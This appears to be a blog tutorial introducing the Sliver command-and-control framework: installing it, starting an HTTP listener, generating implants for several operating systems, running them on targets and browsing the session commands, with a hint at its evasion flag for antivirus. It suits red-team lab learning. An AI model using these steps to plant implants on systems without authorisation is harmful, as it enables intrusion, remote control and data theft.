Just a quick article on a C2 called Sliver, written by Bishop Fox. It's mostly used for Red Teaming, but it's also a pretty cool toy. So, if you're curious about what's out there, stop by.
It is just a basic article, because Sliver is quite large, so I won't cover it in full here; that's a task for you to do in your lab :)
So, what is Sliver, and why did I choose it for this demo? Let's talk a bit about its features.
Features
Dynamic code generation
Compile-time obfuscation
Multiplayer-mode
Staged and Stageless payloads
Procedurally generated C2 over HTTP(S)
DNS canary blue team detection
Secure C2 over mTLS, WireGuard, HTTP(S), and DNS
Fully scriptable using JavaScript/TypeScript or Python
Local and remote process injection
Windows process migration
Windows user token manipulation
Anti-anti-anti-forensics
Let's Encrypt integration
In-memory .NET assembly execution
A couple I find important are dynamic code generation and obfuscation, Multiplayer mode, and some anti-forensics. That being said, ease of deployment, a relatively small footprint, and being able to run in server mode and normal mode on a laptop were pretty important for me, because the same system can be used under different scenarios and is easy to integrate with / run alongside other tools.
It also features a menu structure I'm used to, all in all, so it's fast to learn the basics, and that's a good thing.
It also seems to be pretty up to date and actively developed, another important thing, since we don't want old tools / tools that are no longer being updated.
With features out of the way, on to the fun stuff. How do we install it?
First we need some dependencies: Mingw and the Metasploit Framework (Metasploit is not required, but it's recommended to install it).
apt install mingw-w64 binutils-mingw-w64 g++-mingw-w64 metasploit-framework
Next up, we run the Linux install script
curl https://sliver.sh/install|sudo bash
The script is gonna install Sliver as a systemd service. It should be running after the script is done, but check it anyway with systemctl status sliver.
aded (/etc/systemd/system/sliver.service; disabled; vendor prese>
Active: active (running) since Wed 2021-07-28 16:18:23 CEST; 7s ago
Main PID: 39030 (sliver-server)
Tasks: 11 (limit: 23835)
Memory: 16.6M
CPU: 98ms
CGroup: /system.slice/sliver.service
└─39030 /root/sliver-server daemon
If you get an "inactive", simply start Sliver with
systemctl start sliver
So, next we connect to it, and have a look around.
sliver
Connecting to localhost:31337 ...
███████╗██╗ ██╗██╗ ██╗███████╗██████╗
██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗
███████╗██║ ██║██║ ██║█████╗ ██████╔╝
╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗
███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║
╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝
All hackers gain deathtouch
[*] Server v1.4.20 - 7a38ddffb60d9205b1cef1bac430af742eff4e99
[*] Welcome to the sliver shell, please type 'help' for options
sliver >
So, what can we do here? Why don't we start with the help command?
sliver > help
Commands:
=========
clear clear the screen
exit exit the shell
help use 'help [command]' for command help
monitor Monitor threat intel platforms for Sliver implants
wg-config Generate a new WireGuard client config
wg-portfwd List ports forwarded by the WireGuard tun interface
wg-socks List socks servers listening on the WireGuard tun interface
Generic:
========
background Background an active session
canaries List previously generated canaries
dns Start a DNS listener
env List environment variables
generate Generate an implant binary
http Start an HTTP listener
https Start an HTTPS listener
implants List implant builds
jobs Job control
licenses Open source licenses
load-extension Load a sliver extension
loot Manage the server's loot store
mtls Start an mTLS listener
profiles List existing profiles
reaction Manage automatic reactions to events
regenerate Regenerate an implant
sessions Session management
stage-listener Start a stager listener
update Check for updates
use Switch the active session
version Display version information
websites Host static content (used with HTTP C2)
wg Start a WireGuard listener
Multiplayer:
============
players Manage operators
sliver >
Notice there are a couple of commands called listeners: http, https and mtls?
Since this is a C2, a server for implants to connect back to, we need something they can connect to, a listener. For now stick with a basic one, and let's try http.
sliver > http
[*] Starting HTTP :80 listener ...
[*] Successfully started job #1
Notice it said started job #1? Try the jobs command and let's verify it.
sliver > jobs
ID Name Protocol Port
== ==== ======== ====
1 http tcp 80
sliver >
Okay, Eureka, we got a listener configured :). Now we need some implants, that is, the agents we're going to run on our targets.
Did you notice the generate command? First we need to generate a couple of implants, using the generate command. So, try and ask for help, and let's see what info we have on the generate command.
++ Formats ++
Supported output formats are Windows PE, Windows DLL, Windows Shellcode, Mach-O, and ELF. The output format is controlled with the --os and --format flags.
To output a 64bit Windows PE file (defaults to WinPE/64bit), either of the following command would be used:
generate --mtls foo.example.com
generate --os windows --arch 64bit --mtls foo.example.com
A Windows DLL can be generated with the following command:
generate --format shared --mtls foo.example.com
To output a MacOS Mach-O executable file, the following command would be used
generate --os mac --mtls foo.example.com
To output a Linux ELF executable file, the following command would be used:
generate --os linux --mtls foo.example.com
Usage:
======
generate [flags]
Flags:
======
-a, --arch string cpu architecture (default: amd64)
-c, --canary string canary domain(s)
-d, --debug enable debug features
-n, --dns string dns connection strings
-e, --evasion enable evasion features
-f, --format string Specifies the output formats, valid values are: 'exe', 'shared' (for dynamic libraries), 'service' (see `psexec` for more info) and 'shellcode' (windows only) (default: exe)
-h, --help display help
-H, --http string http(s) connection strings
-X, --key-exchange int wg key-exchange port (default: 1337)
-w, --limit-datetime string limit execution to before datetime
-x, --limit-domainjoined limit execution to domain joined machines
-F, --limit-fileexists string limit execution to hosts with this file in the filesystem
-z, --limit-hostname string limit execution to specified hostname
-y, --limit-username string limit execution to specified username
-k, --max-errors int max number of connection errors (default: 1000)
-m, --mtls string mtls connection strings
-N, --name string agent name
-p, --named-pipe string named-pipe connection strings
-o, --os string operating system (default: windows)
-P, --poll int attempt to poll every n second(s) (default: 1)
-j, --reconnect int attempt to reconnect every n second(s) (default: 60)
-s, --save string directory/file to the binary to
-b, --skip-symbols skip symbol obfuscation
-T, --tcp-comms int wg c2 comms port (default: 8888)
-i, --tcp-pivot string tcp-pivot connection strings
-t, --timeout int command timeout in seconds (default: 60)
-g, --wg string wg connection strings
Sub Commands:
=============
info Get information about the server's compiler
stager Generate a implant stager using MSF
sliver >
So, let's try and generate some basic implants. Remember we used an http listener? So we need to tell the system we want implants to go with that.
To output a 64bit Windows PE file (defaults to WinPE/64bit), either of the following command would be used:
generate --http <ip address of server>
generate --os windows --arch 64bit --http <ip address of server>
A Windows DLL can be generated with the following command:
generate --format shared --http <ip of server>
To output a MacOS Mach-O executable file, the following command would be used
generate --os mac --http <ip of server>
To output a Linux ELF executable file, the following command would be used:
generate --os linux --http <ip of server>
Here are the basic commands for our listener. The files are gonna end up in the folder where Sliver is installed, but for more control over where they are placed, simply use the -s option. The only other option you need to set is the OS option, -o or --os. It can be windows, linux or mac depending on what you're targeting. At this stage, there are no implants for Android.
So, give them a try, and generate them. When you're done, move them onto a web server / Samba share / USB thumb drive and run them on the target system.
If you want to know what implants you've built and for what OS, simply use implants:
sliver > implants
Name OS/Arch Debug Format Command & Control
==== ======= ===== ====== =================
COOL_LAPTOP windows/amd64 false SHARED_LIB [1] http://10.x.x.x
RIDICULOUS_RISK windows/amd64 false EXECUTABLE [1] http://10.x.x.x
BITTER_CORMORANT linux/amd64 false EXECUTABLE [1] http://10.x.x.x
MAGIC_SENATOR darwin/amd64 false EXECUTABLE [1] http://10.x.x.x
MAXIMUM_SASH android/amd64 false EXECUTABLE [1] http://10.x.x.x
Here are my test implants. Note that you can't set the names of the files at compile time; the system is going to generate them at random, but they can be renamed afterwards to something that makes a bit more sense if you like.
So, when you run an implant, the shell in Sliver is gonna tell you that you got a session back.
[*] Session #1 BITTER_CORMORANT - 10.x.x.x:51634 (xeon)
So, run the sessions command to get the session number.
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Last Check-in Health
== ==== ========= ============== ======== ======== ================ ============= ======
1 BITTER_CORMORANT http(s) 10.x.x.x:51634 xeon user linux/amd64 Wed, 28 Jul 2021 16:51:17 CEST [ALIVE]
sliver >
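The implants and sessions tables above share one layout: a header line, a line of = runs under each column, then one row per entry. Here is an added Python parser for that layout (example code written for this article, not part of Sliver) that takes the column boundaries from the = runs, so a multi-word header like Command & Control or a value with spaces like the Last Check-in timestamp stays in one field; the sample table in it is constructed, with the listener address left as the same 10.x.x.x placeholder used above.

```python
"""Parse the tables Sliver's console prints (jobs, implants, sessions).
Added example, not Sliver's own code.  Column boundaries come from the '='
underline, so multi-word headers and values with spaces stay in one field."""
import re

# Constructed sample in the layout of the 'implants' command; the listener
# address is a placeholder, not a real host.  Spacing must be exact.
SAMPLE_IMPLANTS = """\
Name              OS/Arch        Debug  Format      Command & Control
====              =======        =====  ======      =================
COOL_LAPTOP       windows/amd64  false  SHARED_LIB  [1] http://10.x.x.x
BITTER_CORMORANT  linux/amd64    false  EXECUTABLE  [1] http://10.x.x.x
sliver >
"""

_PROMPT = re.compile(r"sliver(\s*\([^)]*\))?\s*>")   # prompt pasted with the table

def _column_spans(underline):
    """(start, end) offsets of each column, read from the '=' runs."""
    starts = [m.start() for m in re.finditer(r"=+", underline)]
    return list(zip(starts, starts[1:] + [None]))   # last column runs to EOL

def parse_table(text):
    """Turn one pasted Sliver table into a list of dicts keyed by header name."""
    lines = [l for l in text.splitlines() if l.strip() and not _PROMPT.match(l)]
    if len(lines) < 2 or "=" not in lines[1] or set(lines[1]) - {"=", " "}:
        raise ValueError("not a Sliver table: missing '=' underline")
    header, underline, rows = lines[0], lines[1], lines[2:]
    spans = _column_spans(underline)
    names = [header[s:e].strip() for s, e in spans]
    return [{n: row[s:e].strip() for n, (s, e) in zip(names, spans)} for row in rows]

def implants_by_os(text):
    """Group implant names by target OS, so every build is accounted for
    (and can be cleaned up) when the engagement ends."""
    groups = {}
    for rec in parse_table(text):
        groups.setdefault(rec["OS/Arch"].split("/")[0], []).append(rec["Name"])
    return groups

if __name__ == "__main__":
    for rec in parse_table(SAMPLE_IMPLANTS):
        print(rec)
    print(implants_by_os(SAMPLE_IMPLANTS))   # {'windows': ['COOL_LAPTOP'], 'linux': ['BITTER_CORMORANT']}
```

Keeping a parsed record of which builds went to which hosts makes it much easier to confirm every implant has been removed when the lab exercise is over.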
And let's connect to that session, and have a look at our implant menu.
sliver > use 1
[*] Active session BITTER_CORMORANT (1)
sliver (BITTER_CORMORANT) >
Notice that the shell switched to BITTER_CORMORANT; it's to let us know we are on the agent running on that target. Since it's a Linux target, let's see what we got.
help
Commands:
=========
clear clear the screen
exit exit the shell
help use 'help [command]' for command help
monitor Monitor threat intel platforms for Sliver implants
wg-config Generate a new WireGuard client config
wg-portfwd List ports forwarded by the WireGuard tun interface
wg-socks List socks servers listening on the WireGuard tun interface
Generic:
========
background Background an active session
canaries List previously generated canaries
dns Start a DNS listener
env List environment variables
generate Generate an implant binary
http Start an HTTP listener
https Start an HTTPS listener
implants List implant builds
jobs Job control
licenses Open source licenses
load-extension Load a sliver extension
loot Manage the server's loot store
mtls Start an mTLS listener
profiles List existing profiles
reaction Manage automatic reactions to events
regenerate Regenerate an implant
sessions Session management
stage-listener Start a stager listener
update Check for updates
use Switch the active session
version Display version information
websites Host static content (used with HTTP C2)
wg Start a WireGuard listener
Multiplayer:
============
players Manage operators
Sliver:
=======
cat Dump file to stdout
cd Change directory
download Download a file
execute Execute a program on the remote system
execute-shellcode Executes the given shellcode in the sliver process
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
ifconfig View network interface configurations
info Get info about session
kill Kill a session
ls List current directory
mkdir Make a directory
msf Execute an MSF payload in the current process
msf-inject Inject an MSF payload into a process
named-pipe Start a named pipe pivot listener
netstat Print network connection information
ping Send round trip message to implant (does not use ICMP)
pivots-list List pivots
portfwd In-band TCP port forwarding
procdump Dump process memory
ps List remote processes
pwd Print working directory
reconfig Reconfigure the active session
rm Remove a file or directory
screenshot Take a screenshot
shell Start an interactive shell
sideload Load and execute a shared object (shared library/DLL) in a remote process
ssh Run a SSH command on a remote host
tcp-pivot Start a TCP pivot listener
terminate Terminate a process on the remote system
upload Upload a file
whoami Get session user execution context
sliver (BITTER_CORMORANT) >
Now, we've got a lot of command options, but the really important ones are under Sliver:
Sliver:
=======
cat Dump file to stdout
cd Change directory
download Download a file
execute Execute a program on the remote system
execute-shellcode Executes the given shellcode in the sliver process
getgid Get session process GID
getpid Get session pid
getuid Get session process UID
ifconfig View network interface configurations
info Get info about session
kill Kill a session
ls List current directory
mkdir Make a directory
msf Execute an MSF payload in the current process
msf-inject Inject an MSF payload into a process
named-pipe Start a named pipe pivot listener
netstat Print network connection information
ping Send round trip message to implant (does not use ICMP)
pivots-list List pivots
portfwd In-band TCP port forwarding
procdump Dump process memory
ps List remote processes
pwd Print working directory
reconfig Reconfigure the active session
rm Remove a file or directory
screenshot Take a screenshot
shell Start an interactive shell
sideload Load and execute a shared object (shared library/DLL) in a remote process
ssh Run a SSH command on a remote host
tcp-pivot Start a TCP pivot listener
terminate Terminate a process on the remote system
upload Upload a file
whoami Get session user execution context
sliver (BITTER_CORMORANT) >
A couple of useful ones are: cat, cd, download, execute, getgid, getpid, getuid, ps, pwd, upload, whoami and shell.
So, since this is a Linux system, they are pretty standard. Should you want to go back to the main menu, simply use the background command, and switch to another session.
Remember what target system you're on, since the commands will work differently for every system; just something to keep in mind.
This was just a quick intro, so go ahead and explore from here on. It's a really cool toy. I know you're gonna wonder why the implants are getting caught by antivirus. Well, remember that -e switch to the generate command?
But remember that this isn't gonna teach you privilege escalation tactics on any kind of platform; that's for you to figure out. It is possible to do, and gain Admin / root, using this system, as well as lateral movement in a network. Again, this is something you won't find here, so I suggest you go read up on it. Remember LOLBins are your best friend sometimes, that and custom tools for the next stage :)
Also, there's nothing on making droppers / Word Macro droppers, drive-by-download websites and so on and so forth. For the same reason, that's for you to figure out. I just want to point out that Google is your best friend, and a lot of patience :)
Happy Hunting :)